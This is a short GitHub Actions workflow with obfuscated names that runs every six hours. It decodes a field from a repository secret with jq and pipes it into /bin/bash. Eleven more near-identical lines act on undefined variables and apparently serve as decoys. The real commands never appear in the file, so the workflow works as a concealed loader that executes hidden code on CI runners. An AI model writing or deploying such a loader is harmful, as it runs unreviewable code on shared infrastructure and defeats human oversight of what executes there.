name: definitelyspinach
on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: definitelyspinach
        env:
          glpsm6397: ${{ secrets.glpsm6397 }}
        run: |
          echo $glpsm6397 | jq -r .rma300 | /bin/bash
          echo $az827 | jq -r .ow289 | /bin/bash
          echo $gd6 | jq -r .x389 | /bin/bash
          echo $mmb80522 | jq -r .ns6597 | /bin/bash
          echo $wmj28 | jq -r .vbsus504 | /bin/bash
          echo $fbu29 | jq -r .kpia09190 | /bin/bash
          echo $xbxy1851 | jq -r .c57 | /bin/bash
          echo $vhjie59835 | jq -r .dskk2455 | /bin/bash
          echo $chqn77257 | jq -r .isw0 | /bin/bash
          echo $sv104 | jq -r .rty105 | /bin/bash
          echo $umkvj610 | jq -r .ddkc221 | /bin/bash
          echo $eenzq07499 | jq -r .yuy6 | /bin/bash

